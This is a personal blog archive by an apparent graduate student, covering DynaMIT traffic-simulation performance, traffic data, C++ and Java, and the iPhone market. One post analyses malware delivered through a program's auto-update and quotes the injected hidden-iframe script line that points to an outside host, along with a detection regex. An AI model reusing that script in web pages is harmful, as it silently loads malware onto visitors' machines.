INRIX TRAFFIC! for iPhone still has a long way to go

I've been experimenting with this app for a while. It does provide some basic real-time and predictive traffic information, but coverage is mostly limited to freeways. It appears to be a prototype of a next-generation traffic data provider/collector -- yes, it can use the information your cell phone provides. Here is what its website claims:

"Every driver in the network anonymously and automatically sends their speed, position and heading to INRIX Smart Driver Network servers. INRIX intelligently combines your information with real-time data from other drivers and traditional road sensors and then instantaneously updates the traffic maps on INRIX TRAFFIC! Everyone in the network benefits from up-to-the-minute, accurate traffic information with superior road coverage. "

To really make this work, there is still a lot to do. One needs large sample sizes to ensure the quality is reliable, and some sort of smart algorithms to make the best of the data. In addition, it would be more useful to users if it were combined with a navigation system, or at least offered some sort of voice guidance on potential congestion based on the current location and speed. And last but not least, the battery life of the phone could kill this sort of app -- not sure about others, but I'm quite concerned about how fast the battery drains when the location service is left on...
posted by wenyang with 0 Comments

What others think about Java and C++

After using Java for production code for a while, I realize that C++ is still my favorite. I admit that Java has some nice features, but it has not yet met my expectations. I am somewhat reluctant to say negative things about Java at this moment, as I still think it would be unfair to do so given my C++ background and limited Java experience. Clearly each language has its strengths and weaknesses. But I do agree with Bruce Eckel, who pointed out in his post The Positive Legacy of C++ and Java that someone was not doing his/her homework when making decisions about Java. It is interesting to see how others, especially those with years of experience in both languages, compare the two.
posted by wenyang with 0 Comments

First update since last summer

I have been wondering whether I can keep this blog after graduation. Not sure if I can find another place and move the posts conveniently.
posted by wenyang with 0 Comments

Last lecture of Randy Pausch

I was supposed to work on my thesis and the TRB paper tonight. But I ended up watching this video "Really Achieving Your Childhood Dreams" on YouTube for more than one hour. If there is only one video on YouTube I could recommend, this is it. 

Randy Pausch, a professor and great teacher at Carnegie Mellon University, passed away a few days ago. He was 47.

posted by wenyang with 0 Comments

Traffic Simulation Workshop (Graz, 2008)

I just came back from Graz, Austria this Thursday. The 2008 Traffic Simulation Workshop went quite well, IMO. Some presentations were quite interesting (and I hope mine was one of them). Moreover, I also got a few good comments, which should be addressed in my forthcoming thesis.

Graz seems to be a nice small town. Thanks to the workshop organizers, especially Prof. Martin Fellendorf, we took part in a hiking trip, a guided city walk, a delicious dinner at the hilltop restaurant on the Schlossberg (with amazing views of the city), and various other interesting activities.

I actually arrived in Graz on June 29th, the day the final game of Euro 2008 was played in Vienna, which is about 2.5 hours away from Graz by car. Two people I knew actually went to Vienna and managed to watch the game live at the stadium! What an experience!


posted by wenyang with 0 Comments

MIT Donation Drive for the Sichuan Earthquake

I got an email from the CSSA list -- CSSA is organizing donations for the earthquake-hit areas in China. Details are available here. We will pray for those caught in the quake and hope we can save as many as possible.

Today I was told that one of my teachers at Tsinghua (Civil Engineering) had gone to Sichuan to assist with the examination and evaluation of building structures there, as part of an effort to make sure they are safe.



posted by wenyang with 1 Comments

Parallel DynaMIT runs on Athena

For a long time I've been searching for more machines to run parallel simulation experiments for my case studies. Our lab does not have that many PCs, and some of them are heavily used by other researchers. I tried to contact MIT academic computing for help, but my emails have been ignored so far. I kept looking, and finally here comes a chance: the Athena clusters.

The Athena clusters have many unused machines during this week, the spring break. On Monday, after some trial and error, I managed to make my parallel DynaMIT run on Athena. If the results are good, I might be able to finish my case studies in time. It is not as convenient as doing experiments in the lab -- one cannot do this remotely; I need to keep an eye on the machines while DynaMIT is running. Anyway, this is better than nothing.

posted by wenyang with 0 Comments

Google and transportation information

Yesterday I read two articles on Google's impact on transportation. One was "Google's Online Maps Gets New Jersey Commuters On Time", the other, "Observer Sees Google's Future In Transportation Routing". Both are available on InformationWeek.

The NJ TRANSIT story is somewhat expected. Given the power of Google Maps and Google Earth, it comes as no surprise to me that Google provides information on transportation systems. If Android becomes more acceptable to handset manufacturers and users (which I believe is just a matter of time), more and more travelers might be able to get (near) real-time information from Google, or maybe from other travel information providers (such as TrafficGauge, Inrix, Traffic.com, SmarTraveler and traditional media companies) as well.

Nowadays getting near real-time data is much easier than before. GPS-equipped probe vehicles, for example, are already in use in many places in the US, China, Europe, and elsewhere. Such data is very useful under general conditions. When sufficient historical data is available, it is relatively easy to optimize routing for a normal situation. The challenge remains, however, when an (unexpected) incident occurs and changes the traffic pattern significantly. In that case, having real-time information can still be very helpful. But what if most people on the road have access to such information? If all (or a significant fraction) of them change their behavior (e.g., route choice), the situation might get even worse, and even real-time information may not be able to tell which route is best because everything is so dynamic -- the road condition at the time one has to make a decision may differ from the condition he/she will eventually experience. In a non-recurrent situation like this, purely statistical methods might not be able to provide accurate and relevant information for travelers. A suitable model (such as DynaMIT) that can generate consistent anticipatory information would be more useful, because it has a built-in capability to handle drivers' overreaction to the travel information in this situation.
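
To make the overreaction problem concrete, here is a toy sketch. It is not DynaMIT's algorithm: the two routes, the linear travel time function, and all numbers are made up for illustration, and the "consistent" split is found with a textbook technique (the method of successive averages) that I am swapping in only to show the idea of guidance that stays valid after drivers react to it.

```python
# Toy example: two parallel routes, hypothetical linear congestion model.
DEMAND = 1000  # drivers choosing between the two routes (made-up number)
ROUTES = [
    {"free_flow_min": 10.0, "capacity": 500.0},   # route 0: short, low capacity
    {"free_flow_min": 15.0, "capacity": 1000.0},  # route 1: longer, high capacity
]


def travel_time(free_flow_min, capacity, flow):
    """Assumed model: travel time grows linearly with flow/capacity."""
    return free_flow_min * (1.0 + flow / capacity)


def times(share_on_route0):
    """Travel times (minutes) on both routes for a given split of drivers."""
    flows = [DEMAND * share_on_route0, DEMAND * (1.0 - share_on_route0)]
    return [
        travel_time(r["free_flow_min"], r["capacity"], f)
        for r, f in zip(ROUTES, flows)
    ]


def naive_guidance(steps=6, share=0.5):
    """Everyone switches to whichever route currently looks faster."""
    history = []
    for _ in range(steps):
        t0, t1 = times(share)
        share = 1.0 if t0 < t1 else 0.0
        history.append(share)
    return history


def consistent_guidance(iterations=200, share=0.5):
    """Successive averages: shift a shrinking fraction toward the faster route."""
    for k in range(1, iterations + 1):
        t0, t1 = times(share)
        target = 1.0 if t0 < t1 else 0.0
        share += (target - share) / (k + 1)
    return share


if __name__ == "__main__":
    print("naive shares on route 0:", naive_guidance())
    share = consistent_guidance()
    print("consistent share on route 0:", round(share, 3), "times:", times(share))
```

With the naive rule the whole crowd flips back and forth between the two routes, so the advice is wrong by the time anyone acts on it. The averaged version settles near a split where both routes take about the same time, which is the kind of self-consistent information the paragraph above is asking for.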

I would say the transportation routing patent by Google is somewhat unexpected. After quickly skimming through the patent, I had the impression that it is more about how to process the data and provide it to users via wireless devices. How they obtain the data and what kind of data could be used is not detailed. Anyway, this reminded me of a meeting last week with Dr. Ramachandran Ramjee, who is currently a Senior Researcher at Microsoft Research, India. He has some interesting ideas on how to collect traffic data from smartphones.

I believe that in maybe a few years we will be able to collect pretty good (and a huge amount of) traffic data from cell phones and use it for traveler information. If I knew of a company working on this now, I would be very interested in working for them. :-)


posted by wenyang with 0 Comments

The DynaMIT runtime figure

For background information about this figure, please see the previous post "Improving DynaMIT runtime performance".
Figure: DynaMIT runtime on the Los Angeles network (single CPU)
posted by wenyang with 0 Comments

Improving DynaMIT runtime performance

In my previous post, I mentioned that I had been working on the case studies lately. Doing profiling experiments can be tedious. One needs to run many scenarios with different binaries and possibly different sets of parameters; results also need to be processed and archived. I usually write a shell script and let the machines do the batch jobs, which frees me up for other work.

While waiting for some results just now, I went over a log file of my previous profiling experiments. It was about DynaMIT runtime on a single-processor machine. Then I created a figure, and made some interesting observations. The figure is so simple that I hope the following “text” version will do the trick. Here it is:

Date      | Runtime (seconds)
Dec, 2006 | ************************************ (1067)
Mar, 2007 | ********************                 (592)
Oct, 2007 | *************                        (384)
Jan, 2008 | *********                            (265)

 
 
For a sophisticated system like DynaMIT, usually one can improve its efficiency in two directions.

  • One is the “scientific” way, which is to find better models and algorithms. This part is often difficult, but would bring dramatic changes to the runtime if we manage to do it. In my research, two major advances were introduced: utilizing sparse matrices in OD estimation, and using smart algorithms to get the most out of parallel simulation. Since I have not yet finished all my case studies, this post is not about it.
  • The other is the “engineering” way -- use whatever is practical to solve the problem. For example, do profiling studies to find bottlenecks before doing any optimization, avoid frequently allocating and de-allocating memory, avoid re-calculation, save intermediate results for future use, and use hashing judiciously. The improvement shown in the figure is primarily due to this part.
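
As a small illustration of the "avoid re-calculation, save intermediate results" idea, here is a minimal sketch. It is Python rather than DynaMIT's own code, and `path_cost`, its cost formula, and the sample paths are hypothetical stand-ins for any expensive computation that gets called repeatedly with the same input.

```python
from functools import lru_cache

CALLS = {"count": 0}  # counts how often the expensive body really runs


@lru_cache(maxsize=None)
def path_cost(path):
    """Hypothetical expensive computation; `path` is a hashable tuple of link lengths."""
    CALLS["count"] += 1
    return sum(length * 1.5 for length in path)


def total_cost(paths):
    """Sum the cost of every path; repeated paths are served from the cache."""
    return sum(path_cost(p) for p in paths)


# Five requests, but only two distinct paths.
paths = [(1.0, 2.0), (3.0,), (1.0, 2.0), (3.0,), (1.0, 2.0)]
total = total_cost(paths)

if __name__ == "__main__":
    print("total cost:", total)
    print("expensive evaluations:", CALLS["count"])
```

The cache is a hash table keyed on the function arguments, so the inputs must be hashable (hence tuples instead of lists). Whether this pays off depends on how often inputs repeat, which is exactly what a profiling run should tell you before you add it.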

The figure indicates a few surprising facts. At the end of 2006, it took about 18 minutes to run this scenario; by the beginning of 2008, that had dropped to about four and a half minutes, or about 1/4 of the original. Another observation was also unexpected: I have been able to cut the runtime by roughly 1/3 (relative to the previous measurement) about every four months for the past year, taking into account the fact that I did not work on it during the whole summer of 2007.
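
For anyone who wants to check the arithmetic, here is a short sketch that recomputes these ratios from the four runtimes in the figure and redraws the text chart. The only inputs are the numbers above; the bar width of 36 characters is simply what the chart uses for the longest run.

```python
# Runtimes (seconds) taken from the text figure in this post.
RUNTIMES = [("Dec 2006", 1067), ("Mar 2007", 592), ("Oct 2007", 384), ("Jan 2008", 265)]
BAR_WIDTH = 36  # number of stars used for the longest run


def bar(seconds, longest):
    """Scale a runtime to a row of stars relative to the longest run."""
    return "*" * round(seconds / longest * BAR_WIDTH)


first = RUNTIMES[0][1]
last = RUNTIMES[-1][1]

# Fraction of the original runtime that remains at the end.
overall_ratio = last / first

# Relative reduction between consecutive measurements.
step_reductions = [
    1 - after / before
    for (_, before), (_, after) in zip(RUNTIMES, RUNTIMES[1:])
]

if __name__ == "__main__":
    for label, seconds in RUNTIMES:
        print(f"{label} | {bar(seconds, first):<{BAR_WIDTH}} ({seconds} s, {seconds / 60:.1f} min)")
    print(f"overall: {overall_ratio:.2f} of the original")
    print("step-by-step reduction:", [f"{r:.0%}" for r in step_reductions])
```

The overall ratio comes out at about 0.25, and the three step-by-step reductions are roughly 45%, 35% and 31%, so "about one third per step" is a fair summary, with the first step being the largest.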

Frankly, I do not expect such a trend to continue for long. Most of the improvements reflected in those tests were achieved by better “engineering” approaches. I spent a lot of effort revising the bad designs and inefficient implementations inherited from the old version I took over. There is still room for further improvement, but my hunch is it would probably give us no more than a 20% gain unless somebody spends tremendous effort on it.

That’s actually one of the reasons why I chose to work on the scalability issues. Single CPU configurations do not scale well. Parallel processing may be the way to go. I already have some promising results. Now the problem is where I can find a cluster with 20 or more machines to finish my case study.


Here is some background about the figure, only for those who are interested:

  • The figure here shows how much time DynaMIT needs to run a simulation of the Los Angeles network for a six-hour morning peak period on a typical day.
  • All tests were performed on our server with an Intel Pentium 4 CPU of 3.6 GHz. The server has 2 GB main memory, but it is not critical here because the simulation would need less than 200 MB for this network.
  • The server runs on Fedora Core 3 (Heidelberg). In all cases DynaMIT was compiled by GNU g++ 3.4.4 with “-O3” flag and the debugging and profiling code was included.
  • The runtime was collected from the “user CPU time” returned by the “time” command. (The difference between the elapsed real time and the user CPU time was generally between 20~25 seconds.)
  • In each test the run was replicated at least five times and the average runtime was used. (The deviation was not significant, though.)
  • While DynaMIT is a stochastic system and random numbers are used in the simulation, all these tests have the same fixed seed for the random number generator. This makes the results replicable.
  • The scenario we used in those tests was the simulation on a calibrated network of the South Park area in downtown LA, California. Archived real sensor data from the field was used in a simulated environment to mimic the real-time data feed.
  • DynaMIT operates in a rolling-horizon mode for real-time (on-line) applications. In the runtime tests we chose to use 15-minute estimation intervals, which were deemed appropriate for this network. Every 15 minutes, sensor data for the past 15 minutes was made available to DynaMIT, which fused it with historical information and tried to generate an unbiased estimate of the state of the whole network. While in a real case study we often use three or more iterations for this state estimation stage, in these runtime tests we only used one estimation iteration per horizon. For each horizon, when the state estimation finished, two 30-minute state prediction iterations were run to generate predictive travel time information and route guidance. Consequently, for each 15-minute interval in our simulation period, we would need to simulate 15+30*2=75 minutes (combining the estimation and prediction stages).
  • My wiki has more details about the LA network, and a flash demo made a long time ago (for other purposes).
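
The rolling-horizon workload described in the list above can be written out as a few lines of arithmetic. This is only a back-of-the-envelope sketch: the function and constant names are mine, and it assumes every 15-minute interval of the six-hour period carries the full estimation-plus-prediction workload.

```python
PERIOD_MIN = 6 * 60            # six-hour morning peak
INTERVAL_MIN = 15              # estimation interval
PREDICTION_HORIZON_MIN = 30    # length of one prediction iteration
PREDICTION_ITERS = 2           # prediction iterations per horizon


def simulated_minutes_per_interval(estimation_iters):
    """Simulated minutes needed for one 15-minute interval."""
    estimation = estimation_iters * INTERVAL_MIN
    prediction = PREDICTION_ITERS * PREDICTION_HORIZON_MIN
    return estimation + prediction


def total_simulated_minutes(estimation_iters):
    """Workload over the whole period, assuming every interval costs the same."""
    intervals = PERIOD_MIN // INTERVAL_MIN
    return intervals * simulated_minutes_per_interval(estimation_iters)


if __name__ == "__main__":
    for iters in (1, 3):
        per_interval = simulated_minutes_per_interval(iters)
        total = total_simulated_minutes(iters)
        print(f"{iters} estimation iteration(s): {per_interval} min per interval, "
              f"{total} min ({total / 60:.1f} h) over the period")
```

With one estimation iteration this gives the 75 minutes per interval quoted above; with three iterations, as in a real case study, it would be 105 minutes per interval under the same assumptions.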

posted by wenyang with 1 Comments

Another committee meeting finished

It's been a long time since my last post. I have been quite busy for the past month, and have just finished my 8th committee meeting. I can't really say yet when I can defend, but there is a good chance it will be this summer. Everything that has a beginning has an end, right?

 
My recent work is about case studies using DynaMIT to demonstrate how we could use scalable methods to speed up real-time Dynamic Traffic Assignment (DTA) systems, which are often envisioned to be the key component of Advanced Traveler Information Systems (ATIS). Such case studies are not easy because one needs to deal with lots of practical issues, which are simply ignored or barely mentioned in the existing literature. I have run into so many existing approaches that were only tested on small networks with cleaned data, and most of them would probably never work in real-time applications for large-scale problems. (Well, ironically, many of them do put the "real-time" tag on themselves and get published.)

 
For my studies, analyzing the complexity of algorithms is not enough; I also need to understand how the hardware works and find the bottlenecks in the whole system from profiling studies. Moreover, to really demonstrate my ideas, I also need to implement my approach in a decent way, and test it on large networks. In one of my early committee meetings, after hearing my presentation, a professor commented: "You are the first (student) to complain about a network is too small." What can I say? Of course I know that using large networks for case studies brings more trouble -- more than just taking longer to run; but if all we do is for a small network, why would one need that much “fire power”?

posted by wenyang with 2 Comments

Wt: a C++ Web Toolkit

I just read an introduction to Wt, by Wim Dumon and Koen Deforche, available at Dr. Dobb's. This library lets programmers write modern web applications using a familiar C++ GUI programming style. The interesting thing about Wt is that it renders the C++ application to the web browser. The authors claim that Wt supports AJAX and provides greater efficiency and a smaller footprint than Java or Ruby solutions. It seems like a good option for those who are comfortable with C++ GUI programming and would rather not invest extra effort in switching to other languages. :-)

This library is released under a dual-license strategy (kind of similar to Qt): one can choose GNU GPL (for free, of course), or a commercial license for a yearly subscription fee.


posted by wenyang with 0 Comments

Backdoor opened by software automatic update

Two days ago I accidentally ran into a backdoor opened by a software update function. Malicious scripts and executables were downloaded to my laptop... I believe the problem is not only inside the software itself, but also related to Internet Explorer or a related Windows security mechanism.

I was trying a photo editing program named nEOiMAGING and suddenly it crashed, with some messages indicating a problem caused by "a.exe". It looked suspicious, didn't it? I had used that software a few times and it had never happened before. Where did the problem originate?

So I opened Process Explorer and found the file at C:\WINDOWS\system32\a.exe (about 14k). A file with such a "simple" name in a system directory almost always means a trojan, virus, or other malware. I had to put aside my normal work to take a careful look at it.

Process Explorer also showed that this file was started by cmd.exe and that the starting directory was exactly where I had nEOiMAGING installed. It seemed it was indeed caused by this software. Then I did some tests. Normally I should not run such tests on my own machine, as there is a chance something could go wrong and mess up my system. But I did not have a virtual machine or sandbox to play with, and most of my files were backed up regularly. So I took a risky approach and ran the software again directly on my laptop. This time, I opened Process Monitor and logged every relevant event.

When I disabled my internet connection, the crash did not happen. But I was able to replicate the same crash when I was connected. Process Monitor showed me how a.exe sneaked into my system. It was copied from a file named "dod.exe" in the "Temporary Internet Files" folder. I then also found some malicious scripts and executables in that directory and its subdirectories.

By then it became clear that the malware was downloaded via the connection opened by nEOiMAGING. I tried to look for an option to turn off the automatic update service in that software, but could not find one. I guessed it was hard-coded. Had it been open-source software, I could have fixed it myself, or somebody else could have fixed it long before. That's another reason I prefer to use free software (http://www.gnu.org/philosophy/free-sw.html) or open-source software, if I have a choice.

The final thing I tried to look at was why this had not happened before -- I had used the same software the day before and it had not caused any trouble then. The scripts found in my Temporary Internet Files folder indicated they came from some website, and they contained code like this
(WARNING: do NOT connect to the site below!)

document.write("<iframe src=http://xxx.hao1680.com/xx.htm?id=017 width=0 height=0></iframe>")

I guessed the update page requested by nEOiMAGING had somehow been compromised, and malicious code had been added via an iframe.
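
If you want to check cached pages or scripts for the same trick, a zero-sized iframe is easy to search for. Below is a minimal sketch, not a real malware scanner: the function name and the regular expressions are my own, the sample string uses a placeholder domain, and it only looks for iframe tags whose width or height attribute is 0.

```python
import re

# Matches an opening iframe tag, including ones embedded in document.write(...).
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Matches width/height attributes with an integer value, quoted or unquoted.
ATTR_RE = re.compile(r"""\b(width|height)\s*=\s*["']?(\d+)""", re.IGNORECASE)


def find_hidden_iframes(text):
    """Return iframe tags whose width or height attribute is 0."""
    hits = []
    for match in IFRAME_RE.finditer(text):
        tag = match.group(0)
        sizes = {name.lower(): int(value) for name, value in ATTR_RE.findall(tag)}
        if sizes.get("width") == 0 or sizes.get("height") == 0:
            hits.append(tag)
    return hits


if __name__ == "__main__":
    # Placeholder URL; do not substitute the real site.
    sample = 'document.write("<iframe src=http://example.invalid/x.htm?id=1 width=0 height=0></iframe>")'
    for tag in find_hidden_iframes(sample):
        print("suspicious:", tag)
```

A hit is only a hint worth a closer look, since legitimate pages sometimes use invisible iframes too, and an attacker can hide one with CSS instead of width and height attributes.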

I did not have the time to figure out the details, but it appeared to me that there must be a backdoor or exploitable hole in Windows that lets such a script download malware to my computer.

This is a little bit disturbing -- it seems that even if you do not use IE, the exploits are still able to bite you via other software that happens to use the internet connection somehow. One has no choice in this matter, unlike in web browsing, where one can choose the somewhat more "secure" Firefox. The possible solutions are (1) stop using that software, or (2) use a firewall to block the access.

posted by wenyang with 1 Comments

iPhone and the wireless market

Today I came across this fascinating article "The Untold Story: How the iPhone Blew Up the Wireless Industry" by Fred Vogelstein (WIRED Magazine: issue 16.02).

One interesting observation is how the introduction of the iPhone changed the wireless business model. In the past, carriers treated their networks as "precious resources", and handsets as "worthless commodities". The reason was "by subsidizing the purchase of cheap phones, carriers made it easier for new customers to sign up -- and get roped into long-term contracts that ensured a reliable revenue stream." During the past few months, however, the iPhone has attracted a great many customers to AT&T, which reaps significant profit margins on its data services (as compared to the voice business). Carriers are starting to feel the need to change.

When people compare the US wireless market with the one in China, researchers and experts from China often call for some sort of regulation/deregulation (though so far they have been unsuccessful in lobbying the policy-makers) to break the monopoly, open the market and introduce more carriers and competition, for the benefit of the end users. The US market was always the typical example people would cite. Ironically, this time the US market is moving towards a situation that its Chinese counterpart was born with -- the carriers open their networks to (almost) all cell phone manufacturers as long as they meet the national standard requirements.
posted by wenyang with 0 Comments